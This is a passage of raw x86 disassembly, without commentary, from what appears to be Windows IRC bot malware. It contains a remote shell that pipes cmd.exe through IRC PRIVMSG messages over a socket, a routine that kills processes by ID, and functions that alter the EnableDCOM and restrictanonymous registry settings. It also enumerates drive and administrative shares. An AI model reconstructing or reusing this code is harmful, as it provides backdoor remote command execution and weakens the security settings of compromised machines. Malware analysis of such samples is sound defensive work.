push ebp
lea ebp, [esp-74h]
sub esp, 298h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+74h+Dest]
push offset asc_438B70 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_41C6C4
push esi ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_98] ; int
call sub_40123B
add esp, 14h
loc_41C6C4: ; CODE XREF: sub_41C66C+3C�j
push [ebp+74h+var_10] ; int
lea eax, [ebp+74h+Str]
push esi ; int
push esi ; Str2
push [ebp+74h+var_C] ; int
push eax ; Str
push [ebp+74h+var_98] ; int
call sub_41C444
add esp, 18h
test eax, eax
lea eax, [ebp+74h+Dest]
jnz short loc_41C6EC
push offset unk_438B4C
jmp short loc_41C6F1
; ---------------------------------------------------------------------------
loc_41C6EC: ; CODE XREF: sub_41C66C+77�j
push offset asc_438B28 ; "-"
loc_41C6F1: ; CODE XREF: sub_41C66C+7E�j
push eax ; Dest
call _sprintf
cmp [ebp+74h+var_8], esi
pop ecx
pop ecx
jnz short loc_41C718
push esi ; int
push [ebp+74h+var_C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_98] ; int
call sub_40123B
add esp, 14h
loc_41C718: ; CODE XREF: sub_41C66C+90�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_14]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41C66C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C736 proc near ; CODE XREF: sub_40274D+74D4�p
; sub_40AF6E+4D�p
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
xor edi, edi
push 0
push 1F0FFFh
inc edi
call ds:dword_42B040 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41C768
push 0
push esi
call ds:dword_42B094 ; TerminateProcess
test eax, eax
jnz short loc_41C768
push esi
xor edi, edi
call ds:dword_42B004 ; CloseHandle
loc_41C768: ; CODE XREF: sub_41C736+1A�j
; sub_41C736+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41C736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41C76D proc near ; DATA XREF: WinMain(x,x,x,x)+3B4�o
push esi
xor esi, esi
loc_41C770: ; CODE XREF: sub_41C76D+1E�j
push 1 ; int
push esi ; int
push esi ; Str2
push esi ; int
push esi ; Str
push esi ; int
call sub_41C444
add esp, 18h
push dword_443450
call ds:dword_42B014 ; Sleep
jmp short loc_41C770
sub_41C76D endp
; =============== S U B R O U T I N E =======================================
sub_41C78D proc near ; CODE XREF: sub_41C7BD+2A�p
; sub_41C7F5+7E�p ...
mov eax, dword_4E277C
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_42B004
jz short loc_41C7A1
push eax
call esi ; CloseHandle
loc_41C7A1: ; CODE XREF: sub_41C78D+F�j
mov eax, dword_4E2778
cmp eax, 0FFFFFFFFh
jz short loc_41C7AE
push eax
call esi ; CloseHandle
loc_41C7AE: ; CODE XREF: sub_41C78D+1C�j
mov eax, dword_4E27B4
cmp eax, 0FFFFFFFFh
jz short loc_41C7BB
push eax
call esi ; CloseHandle
loc_41C7BB: ; CODE XREF: sub_41C78D+29�j
pop esi
retn
sub_41C78D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C7BD(char *Str)
sub_41C7BD proc near ; CODE XREF: sub_40274D+7216�p
; sub_418799+121�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
push 0
lea ecx, [ebp+var_4]
push ecx
push eax
push [ebp+Str]
mov [ebp+var_4], eax
push dword_4E2770
call ds:dword_42B084 ; WriteFile
test eax, eax
jnz short loc_41C7F0
call sub_41C78D
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C7F0: ; CODE XREF: sub_41C7BD+28�j
xor eax, eax
inc eax
leave
retn
sub_41C7BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C7F5(int,char *Str1,int)
sub_41C7F5 proc near ; CODE XREF: sub_41C87C+C0�p
; sub_41C87C+107�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str1 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_42B633 ; Str2
push [ebp+Str1] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_41C838
push 7D0h
call ds:dword_42B014 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+Dest]
push [ebp+Str1]
push offset aPrivmsgSS_1 ; "PRIVMSG %s :%s\r"
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_41C84F
; ---------------------------------------------------------------------------
loc_41C838: ; CODE XREF: sub_41C7F5+1A�j
push [ebp+arg_8]
lea eax, [ebp+Dest]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_41C84F: ; CODE XREF: sub_41C7F5+41�j
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4441A0 ; send
test eax, eax
jg short loc_41C878
call sub_41C78D
loc_41C878: ; CODE XREF: sub_41C7F5+7C�j
xor eax, eax
leave
retn
sub_41C7F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C87C proc near ; DATA XREF: sub_41C9D4+174�o
Dst = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
push esi ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
mov ebx, ds:dword_42B12C
jmp loc_41C952
; ---------------------------------------------------------------------------
loc_41C8A8: ; CODE XREF: sub_41C87C+F1�j
cmp [ebp+var_4], edi
jnz short loc_41C8D8
lea eax, [ebp+var_8]
push eax
push dword_4E27B4
call ds:dword_42B128 ; GetExitCodeProcess
test eax, eax
jz short loc_41C8CE
cmp [ebp+var_8], 103h
jnz loc_41C9A0
loc_41C8CE: ; CODE XREF: sub_41C87C+43�j
push 0Ah
call ds:dword_42B014 ; Sleep
jmp short loc_41C944
; ---------------------------------------------------------------------------
loc_41C8D8: ; CODE XREF: sub_41C87C+2F�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41C8F3
loc_41C8DF: ; CODE XREF: sub_41C87C+75�j
cmp [ebp+eax+Dst], 0Ah
jz loc_41C997
inc eax
cmp eax, [ebp+var_4]
jb short loc_41C8DF
loc_41C8F3: ; CODE XREF: sub_41C87C+61�j
mov [ebp+var_4], esi
loc_41C8F6: ; CODE XREF: sub_41C87C+11F�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push edi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+Dst]
push eax
push dword_4E277C
call ds:dword_42B080 ; ReadFile
test eax, eax
jz loc_41C9AC
lea eax, [ebp+Dst]
push eax ; int
push offset byte_4E2780 ; Str1
push dword_4E2774 ; int
call sub_41C7F5
add esp, 0Ch
loc_41C944: ; CODE XREF: sub_41C87C+5A�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
loc_41C952: ; CODE XREF: sub_41C87C+27�j
add esp, 0Ch
push edi
push edi
lea eax, [ebp+var_4]
push eax
push esi
lea eax, [ebp+Dst]
push eax
push dword_4E277C
call ebx ; PeekNamedPipe
test eax, eax
jnz loc_41C8A8
push offset unk_438BF8 ; int
push offset byte_4E2780 ; Str1
push dword_4E2774 ; int
call sub_41C7F5
push [ebp+arg_0]
call sub_40B149
add esp, 10h
push 1
jmp short loc_41C9CD
; ---------------------------------------------------------------------------
loc_41C997: ; CODE XREF: sub_41C87C+6B�j
inc eax
mov [ebp+var_4], eax
jmp loc_41C8F6
; ---------------------------------------------------------------------------
loc_41C9A0: ; CODE XREF: sub_41C87C+4C�j
call sub_41C78D
push offset unk_438BD0
jmp short loc_41C9B1
; ---------------------------------------------------------------------------
loc_41C9AC: ; CODE XREF: sub_41C87C+A8�j
push offset unk_438BA0 ; int
loc_41C9B1: ; CODE XREF: sub_41C87C+12E�j
push offset byte_4E2780 ; Str1
push dword_4E2774 ; int
call sub_41C7F5
push [ebp+arg_0]
call sub_40B149
add esp, 10h
push edi
loc_41C9CD: ; CODE XREF: sub_41C87C+119�j
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41C87C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9D4 proc near ; CODE XREF: sub_40274D+22E8�p
; sub_418799+9A�p
Dest = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
Dst = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push esi
call sub_41C78D
xor esi, esi
push esi
lea eax, [ebp+var_178]
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_444124 ; SearchPathA
test eax, eax
jnz short loc_41CA0B
or eax, 0FFFFFFFFh
jmp loc_41CB8A
; ---------------------------------------------------------------------------
loc_41CA0B: ; CODE XREF: sub_41C9D4+2D�j
push ebx
push edi
mov edi, ds:dword_42B0A0
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_C]
push eax
xor ebx, ebx
lea eax, [ebp+var_10]
inc ebx
push eax
mov [ebp+var_1C], 0Ch
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41CAD2
push esi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41CAD2
mov edi, ds:dword_42B09C
push 3
push esi
push esi
push offset dword_4E2770
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_42B098 ; DuplicateHandle
test eax, eax
jz short loc_41CAD2
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
pop edi
push edi ; Size
lea eax, [ebp+var_74]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
push esi
mov ebx, offset byte_42B633
push ebx
lea eax, [ebp+var_178]
push eax
mov [ebp+var_74], edi
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jnz short loc_41CADA
loc_41CAD2: ; CODE XREF: sub_41C9D4+60�j
; sub_41C9D4+77�j ...
or eax, 0FFFFFFFFh
jmp loc_41CB88
; ---------------------------------------------------------------------------
loc_41CADA: ; CODE XREF: sub_41C9D4+FC�j
push [ebp+var_4]
mov edi, ds:dword_42B004
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_4E277C, eax
mov eax, [ebp+var_8]
mov dword_4E2778, eax
mov eax, [ebp+Dst]
mov dword_4E27B4, eax
call edi ; CloseHandle
cmp [ebp+arg_4], esi
mov eax, [ebp+arg_0]
mov dword_4E2774, eax
jz short loc_41CB14
push [ebp+arg_4]
jmp short loc_41CB15
; ---------------------------------------------------------------------------
loc_41CB14: ; CODE XREF: sub_41C9D4+139�j
push ebx ; Format
loc_41CB15: ; CODE XREF: sub_41C9D4+13E�j
push offset byte_4E2780 ; Dest
call _sprintf
pop ecx
pop ecx
push esi ; int
push 0Ah ; int
push offset dword_438C5C ; Source
call sub_40AE85
mov ecx, [ebp+var_24]
mov edi, eax
imul edi, 234h
add esp, 0Ch
mov dword_4444F0[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41C87C
push esi
push esi
call ds:dword_42B03C ; CreateThread
cmp eax, esi
mov dword_4444FC[edi], eax
jnz short loc_41CB86
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dest]
push offset asc_438C28 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esp, 10h
loc_41CB86: ; CODE XREF: sub_41C9D4+189�j
xor eax, eax
loc_41CB88: ; CODE XREF: sub_41C9D4+101�j
pop edi
pop ebx
loc_41CB8A: ; CODE XREF: sub_41C9D4+32�j
pop esi
leave
retn
sub_41C9D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB8D proc near ; CODE XREF: sub_41D1C3+37�p
Dest = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_444274, edi
jnz loc_41CCBB
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CC14
lea eax, [ebp+Str+2]
push eax ; Str
mov word ptr [ebp+Str+2], 4Eh
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp+Dest]
jz short loc_41CBFC
push offset dword_438ED8
jmp short loc_41CC01
; ---------------------------------------------------------------------------
loc_41CBFC: ; CODE XREF: sub_41CB8D+66�j
push offset asc_438EB8 ; "-"
loc_41CC01: ; CODE XREF: sub_41CB8D+6D�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
jmp short loc_41CC27
; ---------------------------------------------------------------------------
loc_41CC14: ; CODE XREF: sub_41CB8D+36�j
lea eax, [ebp+Dest]
push offset asc_438E88 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41CC27: ; CODE XREF: sub_41CB8D+85�j
cmp [ebp+arg_C], edi
jnz short loc_41CC46
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CC46: ; CODE XREF: sub_41CB8D+9D�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CCB4
push 4
lea eax, [ebp+Str]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], 1
call dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp+Dest]
jz short loc_41CC9C
push offset dword_438E38
jmp short loc_41CCA1
; ---------------------------------------------------------------------------
loc_41CC9C: ; CODE XREF: sub_41CB8D+106�j
push offset asc_438E04 ; "-"
loc_41CCA1: ; CODE XREF: sub_41CB8D+10D�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
jmp short loc_41CCCE
; ---------------------------------------------------------------------------
loc_41CCB4: ; CODE XREF: sub_41CB8D+DE�j
push offset dword_438DC8
jmp short loc_41CCC0
; ---------------------------------------------------------------------------
loc_41CCBB: ; CODE XREF: sub_41CB8D+13�j
push offset asc_438D98 ; "-"
loc_41CCC0: ; CODE XREF: sub_41CB8D+12C�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41CCCE: ; CODE XREF: sub_41CB8D+125�j
cmp [ebp+arg_C], edi
jnz short loc_41CCED
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CCED: ; CODE XREF: sub_41CB8D+144�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
cmp dword_44429C, edi
pop ecx
jnz loc_41CE6A
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_41CD10: ; CODE XREF: sub_41CB8D+2C1�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+Str]
push eax
push 1F6h
push edi
call dword_44420C
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41CDAF
cmp eax, 0EAh
jz short loc_41CDAF
xor esi, esi
loc_41CD3E: ; CODE XREF: sub_41CB8D+21B�j
push off_4434B8[esi]
push edi
call sub_41B8EE
pop ecx
pop ecx
push off_4434B8[esi]
test eax, eax
lea eax, [ebp+Dest]
jnz short loc_41CD63
push offset dword_438D74
jmp short loc_41CD68
; ---------------------------------------------------------------------------
loc_41CD63: ; CODE XREF: sub_41CB8D+1CD�j
push offset asc_438D48 ; "-"
loc_41CD68: ; CODE XREF: sub_41CB8D+1D4�j
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41CD95
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CD95: ; CODE XREF: sub_41CB8D+1EC�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_41CD3E
jmp loc_41CE47
; ---------------------------------------------------------------------------
loc_41CDAF: ; CODE XREF: sub_41CB8D+1A6�j
; sub_41CB8D+1AD�j
mov esi, dword ptr [ebp+Str]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_41CE3E
loc_41CDBE: ; CODE XREF: sub_41CB8D+2AD�j
mov edi, [esi]
push edi ; Str
call _wcslen
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41CE33
push edi
call sub_41B802
push eax
push 0
call sub_41B8EE
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+Dest]
jnz short loc_41CDF3
push offset dword_438D24
jmp short loc_41CDF8
; ---------------------------------------------------------------------------
loc_41CDF3: ; CODE XREF: sub_41CB8D+25D�j
push offset asc_438CF8 ; "-"
loc_41CDF8: ; CODE XREF: sub_41CB8D+264�j
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41CE26
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CE26: ; CODE XREF: sub_41CB8D+27D�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
loc_41CE33: ; CODE XREF: sub_41CB8D+240�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41CDBE
xor edi, edi
loc_41CE3E: ; CODE XREF: sub_41CB8D+22B�j
push dword ptr [ebp+Str]
call dword_444140
loc_41CE47: ; CODE XREF: sub_41CB8D+21D�j
cmp [ebp+var_10], 0EAh
jz loc_41CD10
lea eax, [ebp+Dest]
push offset asc_438CD0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
pop ebx
jmp short loc_41CE7D
; ---------------------------------------------------------------------------
loc_41CE6A: ; CODE XREF: sub_41CB8D+173�j
lea eax, [ebp+Dest]
push offset asc_438CA0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41CE7D: ; CODE XREF: sub_41CB8D+2DB�j
cmp [ebp+arg_C], edi
jnz short loc_41CE9B
push edi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CE9B: ; CODE XREF: sub_41CB8D+2F3�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_41CB8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEAF proc near ; CODE XREF: sub_41D1C3:loc_41D201�p
Dest = byte ptr -220h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
Str = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_444274, ebx
push esi
jnz loc_41CFD9
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CF36
lea eax, [ebp+Str+2]
push eax ; Str
mov word ptr [ebp+Str+2], 59h
call _strlen
pop ecx
push eax
lea eax, [ebp+Str+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp+Dest]
jz short loc_41CF1E
push offset dword_439050
jmp short loc_41CF23
; ---------------------------------------------------------------------------
loc_41CF1E: ; CODE XREF: sub_41CEAF+66�j
push offset asc_439034 ; "-"
loc_41CF23: ; CODE XREF: sub_41CEAF+6D�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
jmp short loc_41CF49
; ---------------------------------------------------------------------------
loc_41CF36: ; CODE XREF: sub_41CEAF+36�j
lea eax, [ebp+Dest]
push offset asc_438E88 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41CF49: ; CODE XREF: sub_41CEAF+85�j
cmp [ebp+arg_C], ebx
jnz short loc_41CF68
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41CF68: ; CODE XREF: sub_41CEAF+9D�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_444238 ; RegOpenKeyExA
test eax, eax
jnz short loc_41CFD2
push 4
lea eax, [ebp+Str]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov dword ptr [ebp+Str], ebx
call dword_4440E4 ; RegSetValueExA
test eax, eax
lea eax, [ebp+Dest]
jz short loc_41CFBA
push offset dword_438FF4
jmp short loc_41CFBF
; ---------------------------------------------------------------------------
loc_41CFBA: ; CODE XREF: sub_41CEAF+102�j
push offset asc_438FBC ; "-"
loc_41CFBF: ; CODE XREF: sub_41CEAF+109�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+var_4]
call dword_4441E8 ; RegCloseKey
jmp short loc_41CFEC
; ---------------------------------------------------------------------------
loc_41CFD2: ; CODE XREF: sub_41CEAF+DE�j
push offset dword_438F80
jmp short loc_41CFDE
; ---------------------------------------------------------------------------
loc_41CFD9: ; CODE XREF: sub_41CEAF+13�j
push offset asc_438D98 ; "-"
loc_41CFDE: ; CODE XREF: sub_41CEAF+128�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41CFEC: ; CODE XREF: sub_41CEAF+121�j
cmp [ebp+arg_C], ebx
jnz short loc_41D00B
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41D00B: ; CODE XREF: sub_41CEAF+140�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
cmp dword_44429C, ebx
pop ecx
jnz loc_41D17E
push edi
xor esi, esi
mov edi, 200h
loc_41D02C: ; CODE XREF: sub_41CEAF+1EA�j
push dword_4434BC[esi] ; int
push off_4434B8[esi] ; Str
push ebx ; int
call sub_41B883
add esp, 0Ch
push off_4434B8[esi]
test eax, eax
lea eax, [ebp+Dest]
jnz short loc_41D058
push offset dword_438F60
jmp short loc_41D05D
; ---------------------------------------------------------------------------
loc_41D058: ; CODE XREF: sub_41CEAF+1A0�j
push offset asc_438F38 ; "-"
loc_41D05D: ; CODE XREF: sub_41CEAF+1A7�j
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41D086
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41D086: ; CODE XREF: sub_41CEAF+1BB�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_41D02C
call ds:dword_42B130 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41D166
loc_41D0AE: ; CODE XREF: sub_41CEAF+2B1�j
test byte ptr [ebp+var_4], 1
jz loc_41D15B
cmp bl, 41h
jz loc_41D15B
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah ; Count
push eax ; Dest
call __snprintf
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah ; Count
push eax ; Dest
call __snprintf
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_44407C ; GetDriveTypeA
cmp eax, 3
jnz short loc_41D15B
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_14]
push eax ; Str
push 0 ; int
call sub_41B883
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+Dest]
jnz short loc_41D11F
push offset dword_438F60
jmp short loc_41D124
; ---------------------------------------------------------------------------
loc_41D11F: ; CODE XREF: sub_41CEAF+267�j
push offset asc_438F38 ; "-"
loc_41D124: ; CODE XREF: sub_41CEAF+26E�j
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41D14E
push 1 ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41D14E: ; CODE XREF: sub_41CEAF+283�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
loc_41D15B: ; CODE XREF: sub_41CEAF+203�j
; sub_41CEAF+20C�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_41D0AE
loc_41D166: ; CODE XREF: sub_41CEAF+1F9�j
lea eax, [ebp+Dest]
push offset asc_438F08 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_41D191
; ---------------------------------------------------------------------------
loc_41D17E: ; CODE XREF: sub_41CEAF+16F�j
lea eax, [ebp+Dest]
push offset asc_438CA0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41D191: ; CODE XREF: sub_41CEAF+2CD�j
cmp [ebp+arg_C], ebx
jnz short loc_41D1AF
push ebx ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+arg_4] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41D1AF: ; CODE XREF: sub_41CEAF+2E5�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_41CEAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41D1C3 proc near ; DATA XREF: sub_40274D+2BEC�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
